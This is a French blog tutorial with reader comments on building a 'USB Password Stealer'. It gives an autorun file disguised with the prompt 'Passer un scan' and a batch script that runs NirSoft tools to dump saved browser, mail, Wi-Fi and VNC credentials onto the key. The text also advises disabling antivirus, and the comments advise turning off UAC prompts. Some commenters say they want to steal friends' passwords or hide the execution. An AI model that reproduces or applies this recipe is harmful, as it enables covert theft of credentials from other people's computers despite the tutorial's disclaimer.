Aspirateur de mots de passe ou USB Password Stealer

Bonjour à tous, aujourd'hui je vais vous parler des aspirateurs de mots de passe, également connus sous le nom de "USB Password Stealer" (traduisez "Voleur de mots de passe USB"). Pour vous familiariser avec le concept, voici une vidéo de démonstration :

Il s'est passé quoi là exactement ?

Eh bien c'est très simple : on branche une clé USB à un ordinateur allumé et cette dernière récupère (presque) tous les mots de passes enregistrés sur l'ordinateur.

Cela peut s'avérer bien pratique lorsque vous vous apprêtez à formater votre ordinateurs et que vous voulez récupérer vos mots de passe Firefox, Thunderbird et autres sans y passer une après midi complète.

Ce tutoriel est écrit dans un but ludique. Sachez qu'il est illégal d'effectuer ce genre de manip' sur un ordinateur qui ne vous appartient pas, il s'agit ni plus ni moins de vol. Fire-DIY décline toute responsabilité quant à l'utilisation de ce tutoriel par des personnes mal avisées et vous rappelle que vous êtes responsables de vos actes.

Concrètement, la clé USB embarque une dizaine de petits programmes tous spécialisés dans la capture de mots de passe, chacun pour une application particulière. Par exemple pour msn (qui utilise encore ça ? ^^), Chrome, Internet Explorer ...etc. Vous l'aurez compris, c'est très simple d'utilisation mais très puissants (et potentiellement dangereux si on ne verrouille pas sa session...).

Allez, place à la pratique !

1. Autorun

La première étape consiste à créer un fichier autorun qui va permettre d'automatiser le lancement des programmes dont je vous ai parlé lors de l'insertion du périphérique de stockage, en l'occurrence notre clé USB. A travers ce fichier, nous allons demander à Windows d'exécuter un batch (que nous écrirons à l'étape 2) qui s'occupera de lancer tous les programmes de capture de mot de passe. Ceci permet de n'avoir qu'à brancher la clé USB pour que tout se déroule tout seul.

Ouvrez donc votre éditeur de texte favoris (Notepad++ ou Sublime Text par exemple) et collez-y le bout de code suivant :

[autorun]
open=launch.bat
ACTION=Passer un scan

Enregistrez ce fichier sur votre clé USB sous le nom de "AUTORUN.inf".

2. Le batch

Cette fois ci, nous allons écrire le batch qui va exécuter un à un les programmes de récupération de mots de passe.

Comme pour l'étape précédente, ouvrez votre éditeur de texte et tapez le code suivant :

 

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt

 

Ce code est vraiment très simple à comprendre, on démarre un programme avec "start" et on enregistre dans un fichier texte ce qu'il nous renvoie grâce à la commande "/stext".

Là encore, enregistrez ce fichier sur votre clé USB et nommez-le "launch.bat".

3. Téléchargement des programmes

Maintenant, il faut télécharger les programmes appelés par notre batch (eh oui, sinon rien ne va se lancer).

Voici les liens de téléchargement des différents programmes cités plus hauts :

Ils se présentent sous la forme d'archives ZIP. Décompressez-les et déplacez les exécutables (.exe) à la racine de votre clé USB (là où il y a déjà AUTORUN.inf et launch.bat).

Screenshot du contenu de la clé USB

Votre clé USB est maintenant prête pour utilisation.

 

4. Effectuer un test

Maintenant que notre clé USB est fin prête, nous allons effectuer un petit test pour vérifier que tout fonctionne correctement.

Retirez votre clé en toute sécurité puis rebranchez-là. Si tout se passe bien, une fenêtre d'alerte affichant "Passer un scan" apparaît. Cliquez simplement sur OK pour lancer l'aspirateur de mots de passe. Maintenant rendez-vous sur votre clé. Vous pouvez voir que des fichiers texte sont apparu. Ce sont ces fichiers textes qui contiennent les mots de passe capturés par chaque programme.

Exemple d'une capture de mot de passe

Vous n'avez plus qu'à retirer votre clé en toute sécurité pour ne pas perdre les mots de passe sauvegardés.

Je n'ai aucune fenêtre qui s'ouvre lorsque je branche ma clé, comment ça se fait ?

Pas de panique, ça n'est pas ça qui va nous arrêter ! Il arrive en effet que l'autorun soit désactivé pour des raisons de sécurité. Dans ce cas, il vous suffit de vous rendre sur la clé et de double cliquer sur "launch.bat" pour le lancer, c'est tout !

Pensez à désactiver votre antivirus (temporairement bien sûr) si vous ne voulez pas avoir une pop-up d'alerte bloquante qui s'ouvre à chaque exécution d'un programme de capture.

C'est la fin de ce tuto, j'espère qu'il vous aura été utile et que maintenant vous penserez à verrouiller votre session lorsque vous vous absentez.
Pour rappel, le raccourci clavier pour verrouiller Windows est Win + L.

A bientôt sur fire-DIY !

Vos réactions (57) :

lord22

Tuto bien pratique pour récupérer tous les mots quand je doit refaire mon pc. Plus besoin de chercher partout pour voir si j'ai pas oublier un mot de passe quelque part.
Petit question: Sous windows 7 certain programme doivent être valider pour être exécuter comment puis-je faire pour forcer l’exécution

04/10/2013 à 16:15

lobodol

@lord22 : Comment ça "validés" ? Si tu exécute le batch en tant qu'administrateur ça ne suffit pas ?
Tu n'as pas un anti-virus qui bloque certains programmes ?

07/10/2013 à 14:02

lord22

Je me suis mal exprimé désolé, malgré que je soit administrateur de mon pc, certaint programme comme netpass.exe, me demande ""voulez-vous autoriser le programme suivant à apporter des modifications à cet ordinateur"
Dois-je modifier les paramètres de mon pc ou bien une commande permet de valider automatiquement sans intervention de ma part?

merci

10/10/2013 à 17:33

lobodol

@lord22 : Ah oui je vois, les joies de Windows 7...
Quand cette fenêtre apparait, clic sur "Changer quand ces notifications apparaissent" en bas à droite.
Dans le fenêtre qui s'ouvre ensuite, positionne le curseur sur "Ne jamais m'avertir". Clic sur OK, confirme dans la fenêtre qui s'ouvre et c'est OK.

11/10/2013 à 09:49

lord22

Merci pour le conseil.

C'est vraiment un super tuto, et une technique de sauvegarde de mot passe beaucoup plus rapide

12/10/2013 à 15:41

ManaBoys

Hello super le tuto, cependant lorsque les mots de passe s'enregistre au lieu d'avoir du .txt j'ai .cfg
Comment faire? car l'ouvrir avec le bloc note ou autre ça me donne (peut être) du hexadécimal!

07/11/2013 à 00:48

lobodol

@ManaBoys : Salut, tu as des 'cfg' pour tous les fichiers générés ?
Normalement, cette extension est utilisée pour les fichiers de config... Ca donne quoi quand tu l'ouvre avec NotePad++ ?

07/11/2013 à 12:20

Loloi

Le lien cromepass ne marche pas

05/12/2013 à 19:43

Petitpaul

Bonjour, merci pour le tuto !

Quand je met la clef USB dans mon 2e ordinateur, il apparait un message disant que le fichier est inexistant. J'ai ouvert le "launch" avec les droits d'administrateurs et' j'ai windows 7. Merci pour votre aide.

09/12/2013 à 03:58

lobodol

@Petitpaul : Salut, assure-toi que les chemins que tu as renseigné dans ton .bat correspondent bien avec les chemins de tes exécutables.

09/12/2013 à 12:05

Petitpaul

J'ai copié-collé le texte que vous avez fournis. J'ai fais la procédure de création de la clef USB sur un mac. Croyez vous que cette raison pourrait être la cause du problème ?

09/12/2013 à 12:46

lobodol

@Petitpaul : en effet il est fort probable que ça vienne de là. Je ne l'ai pas précisé par ce que ça me semblait évident, mais cette technique d'aspiration de mot de passe ne concerne que Windows.

09/12/2013 à 13:46

Petitpaul

Si je démarre manuellement les programme sous Windows, croyez vous que cela fonctionnera ?

09/12/2013 à 20:18

kinger

bonsoir j ai lu votre tuto qui est tres interresant mais j aimerais savoir s'il existe la meme chose mais pour copier tout les dossier du disque dur ?

22/01/2014 à 21:37

lobodol

@Petitpaul : Oui ça marchera
@kinger : tu peux faire un batch toi-même qui copie tout de manière récursive mais ça risque de prendre du temps.

22/01/2014 à 21:53

YOUYOU

Bonjour,
Tout les mot de passe ne s'affiche pas dans les fichiers texte , soit l'user name s'affiche ou soit le passwordl s'affiche . Comment ça se fait ?

02/02/2014 à 17:08

lobodol

@YOUYOU : honnêtement je n'en ai aucune idée...

05/02/2014 à 21:25

Nika

Rien à dire ca marche!!!!

27/04/2014 à 23:52

tyron1930

commenrt faire pour que launch.bat devienne un fichier de commande moi il est en texte

31/05/2014 à 17:08

lobodol

@tyron1930 : Merci d'utiliser le forum lorsque vous avez besoin d'aide. Les commentaires ne sont pas adaptés pour ça.
Les commentaires sont plus là pour suggérer des améliorations de l'article ou signaler un problème (lien défectueux, informations erronée...etc)
Merci de votre compréhension :)

03/06/2014 à 09:20

conrados1

Superbe! Comme ça je pourrais voler les mot de passes d'un amis >:)

20/06/2014 à 19:44

lobodol

@conrados1 : eh bien je suis content de pas être ton ami

20/06/2014 à 19:49

gyps

Bonjour,

Je n'arrive pas à utiliser cette méthode, lorsque je remet la clé usb, il ne se passe rien, j'ai essayé de démarrer le launch en double cliquant (là il apparaît furtivement et puis plus rien), j'ai aussi essayé en tant qu'admin mais rien ? (je sais qu'il vaut mieux poser cette question sur le forum mais je ne sais pas dans quelle catégorie ;) merci d'avance

03/07/2014 à 13:14

lobodol

Tu peux créer un nouveau sujet dans le forum Hacking et sécurité de la catégorie "Informatique".
Tu as bien copié/collé le code fourni ? Les liens vers les fichiers sont correctes ?

PS : On ne t'en voudra pas de créer un nouveau sujet, même dans la mauvaise catégorie, ton sujet sera juste déplacé par un admin au bon endroit ;)

03/07/2014 à 13:27

Anony

Bonjour lobodol, as-tu testé la clé USB sur ton ordinateur ? Moi oui, mais maintenant, je ne connaissais pas nirsoft, et j'ai tout installé.Donc, une fois les éxécutables lancés,est-ce que les mots de passes ne vont pas aussi chez Nirsoft ? Je doute maintenant, mais je n'ai rien vu de bizarre dans les codes sources,mais bon, je suis pas sûr.

21/07/2014 à 12:30

Anony

Bonjour lobodol, as-tu testé la clé USB sur ton ordinateur ? Moi oui, mais maintenant, je ne connaissais pas nirsoft, et j'ai tout installé.Donc, une fois les éxécutables lancés,est-ce que les mots de passes ne vont pas aussi chez Nirsoft ? Je doute maintenant, mais je n'ai rien vu de bizarre dans les codes sources,mais bon, je suis pas sûr.

21/07/2014 à 12:30

lobodol

@Anony : Salut, je n'ai pas vérifié mais c'est vrai que ça serait intéressant de le faire. Je vérifierai avec Wireshark si des données sont envoyées, mais j'en doute quand même, l'information aurait été révélée depuis un moment vu la popularité des scripts.

21/07/2014 à 23:06

haliloula

bonjour
très bon tuto et Mercie pour le partage bonne continuation [LOBODOL]

01/08/2014 à 15:04

salazarhackeur

cool vos tutos! du courage

21/12/2014 à 04:28

jack

g pas compris vous pouvez m'expliquer

27/05/2015 à 21:54

jack

dans la 3 eme etape est qu on doit creer un neauvau notpad ou le meme

27/05/2015 à 21:56

Krys94320

Bonjour lobodol, j'ai réalisé toutes les étapes de ce tuto à part celle ou l'on doit transformer les dossier en exécutable. Pourrais-tu me m'expliquer comment procéder s'il te plait. ^^

22/11/2015 à 17:59

lobodol

@Krys94320 : salut, il n'y a pas de transformation de dossier en exécutable, simplement écriture d'un batch qui exécutera automatiquement les exe.
Par contre, je précise que ce totu est à prendre avec des pincettes car les programmes ne semblent plus exécutables en ligne de commande depuis leur dernière version : http://www.firediy.fr/forum/sujet/usb-password-stealer#post-270

23/11/2015 à 09:25

Mimick61

Coucou... Mon problème est que pas mal de fichier sont en .cfg alors comment faire pour les lire ou juste les mettre en .txt ? help

31/12/2015 à 00:55

lobodol

Avec n'importe quel éditeur de texte, genre notepad++

31/12/2015 à 12:03

Mimick61

Ouais mes le truc ses que le fichier chromepass.cfg ne m'affiche pas mes mots de passe alors que sur le logiciel on voit bien tous les mots de passe

31/12/2015 à 12:22

lobodol

C'est des fichiers de config les .cfg.
Dans les nouvelles versions des exe il n'est plus possible d'exporter les mdp dans des txt. Le sujet z déjà été traité sur le forum

31/12/2015 à 12:25

Mimick61

Euuux... Ouais... Ou je peut trouver la solution a mon problème ? :)

31/12/2015 à 12:33

lobodol

ici entre autres

31/12/2015 à 12:36

NTM LA SOCIETE AHAH

Salut salut, je tiens juste a prévenir que les logiciels envoi aussi leurs petites "trouvailles" (mdp...) a l'auteur de l'article :D
D'ou le fait qu'il dit de faire un test sur votre PC ;P

13/02/2016 à 23:58

lobodol

Et sur quoi tu bases pour affirmer ça ? Tu as fait une analyse réseau ?
Donc non,c'est totalement faux, les softs n'envoient rien à personne. Et si tu flippe tant que ça, Rien ne t'empêche de débrancher ton câble réseau quand tu les utilise.

14/02/2016 à 13:09

iFrooz

bonjour,
ya t'il une version pour le windows 64 ?
car ca ne veut pas :(

10/05/2016 à 18:07

lobodol

Quelle version de Windows ?

11/05/2016 à 12:25

@Joseph

ça marche mais n'y a t'il pas moyen de cacher l'exécution des logiciels ?

17/09/2016 à 08:41

Decryptographiste

Est ce que ca marche aussi sur d'autre plateforme que Windows, comme si j'utilise un MAC ?

22/09/2016 à 11:53

lobodol

@Decryptographiste : Non, ce sont des exécutables pour Windows uniquement.
Je ne sais pas s'il existe des versions pour Mac :/

23/09/2016 à 09:12

midou1994

I want to try this trick on ur computer

30/09/2016 à 10:42

Nofax354

l'autorun ne fonctionne pas de l'aide svp

04/10/2016 à 20:59

donmike

j'ai les problèmes pour telecharger les programme svp aidez moi a telecharger

14/11/2016 à 00:37

lobodol

@donmike : 'suffit de cliquer sur les liens "download" !

14/11/2016 à 17:26

Jean

Est-ce possible avec les outils de SterJo Password de http://www.sterjosoft.com ?

12/01/2017 à 19:16

rayanou2002

s'il vous plait l'autorun ne marche pas sur windows 10 est-ce normal??

07/02/2017 à 02:29

lobodol

Oui c'est tout à fait normal, Microsoft à désactivé l'autorun depuis 2014

07/02/2017 à 09:25

boulyan

Bonjour,
Quand je veux télécharger les programmes(3eme paragraphe)
Il me demande un nom d'utilisateur et un mdp je note quoi?.

merci

15/02/2017 à 22:31

lolo

bonjour a tous

s'il vous plait aidez moi,je ne comprend pas ou se trouve les .EXE pour toutes les extensions.....pouvez vous donner directement les .EXE PLUTOT QUE LES LIENS S'IL VOUS PLAIT OU ME DONNER L'EMPLACEMENT exactement

merci beaucoup et belle journee a tous

07/03/2017 à 20:34

mamadouberthe300

j'arrive pas

01/05/2017 à 04:04

CaputLiberum

Bonjour,
Pour Chrome et Firefox ceux ne sont pas des fichiers *txt mais des fichiers *cfg qui apparaissent.
Une idée?
Merci

23/10/2017 à 18:27

Les commentaires sont désactivés.